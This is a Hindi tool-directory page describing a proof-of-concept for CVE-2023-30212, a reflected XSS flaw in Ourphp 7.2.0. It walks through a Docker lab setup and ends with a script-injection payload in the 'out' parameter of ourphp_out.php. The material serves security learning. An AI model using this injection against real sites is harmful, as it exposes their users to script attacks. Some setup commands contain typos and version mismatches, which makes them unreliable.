Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-30212-POC — CVE-2023-30212 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण, Ourphp 7.2.0 में एक XSS भेद्यता, Docker सेटअप और पेलोड प्रदर्शन सहित। | Kitploit
उपकरण/GitHubGitHub/arunsnap/cve-2023-30212-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubarunsnap/cve-2023-30212-poc

CVE-2023-30212-POC

CVE-2023-30212 के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण, Ourphp 7.2.0 में एक XSS भेद्यता, Docker सेटअप और पेलोड प्रदर्शन सहित।

रिपॉजिटरी देखें
113 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-30212-POC

एक असुरक्षित Docker वातावरण बनाना और Ourphp संस्करण 7.2.0 में कमजोरी का शोषण ( CVE 2023 30212 )

चरण 1. अपने सिस्टम में Docker डाउनलोड और इंस्टॉल करें। मैं Docker का उपयोग कर रहा हूँ क्योंकि यह ubuntu इंस्टॉल करने में तेज़ और आसान है

चरण 2. Docker वातावरण सेट करें

root@kitploit:~
sudo apt-get install docker.io
docker pull ubuntu
docker run -d -t --name test-container -p 80:80 -p 443:44
3 -p 3306:3306 -p 21:21 ubuntu
docker exec -it test-container bash

चरण 3. निर्भरताएँ इंस्टॉल करना

root@kitploit:~
apt-get update
apt-get install wget
apt-get install nano
apt-get install unzip
apt-get install net-tools
apt-get install locate

चरण 4. वेब सर्वर, php और mysql इंस्टॉल करें। इसके लिए मैं xampp सर्वर इंस्टॉल करूँगा।

root@kitploit:~
wget https://liquidtelecom.dl.sourceforge.net/project/xampp/XAMPP%20Linux/7.2.0/xampp-linux-x64-7.2.0-0-installer.run
chmod +x xampp-linux-x64-7.2.0-0-installer.run
./xampp-linux-x64-7.2.0-0-installer.run
cd /opt/lampp
./xmapp start

चरण 5. Ourphp संस्करण 7.2.0 डाउनलोड करें

root@kitploit:~
wget https://zdown.chinaz.com/202305/ourphp-zyb-v7.5.0.20230515.zip
cp ourphp-zyb-v7.5.0.20230515.zip /opt/lampp/htdocs
unzip ourphp-zyb-v7.5.0.20230515.zip /opt/lampp/htdocs/
chmod -R 777

चरण 6. ब्राउज़र पर Ourphp सेट करें अपना ब्राउज़र खोलें और localhost या 127.0.0.1 दर्ज करें निर्देशों का पालन करें और Ourphp इंस्टॉल करें

चरण 7. कमजोरी का शोषण Ourphp 7.2.0 संस्करण में XSS (क्रॉस-साइट स्क्रिप्टिंग) की कमजोरी है। /client/manage/ourphp_out.php फ़ाइल में कमजोरी को कम करने के लिए जो XSS कोड के निष्पादन की अनुमति देती है

लॉगिन खोज

आपको कोड को संशोधित करने की आवश्यकता है। कमजोरी तब उत्पन्न होती है जब "ourphp_admin" पैरामीटर "logout" पर सेट होता है, और नियंत्रणीय चर "out" है

अंतिम

अवधारणा का प्रमाण

root@kitploit:~
 payload - "</script><script>alert('xss')</script>".
root@kitploit:~
parameter - http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert('xss')</script>

वीडियो

वीडियो
(https://www.youtube.com/watch?v=l9lHyjY9_X0)

टूल डाउनलोड करें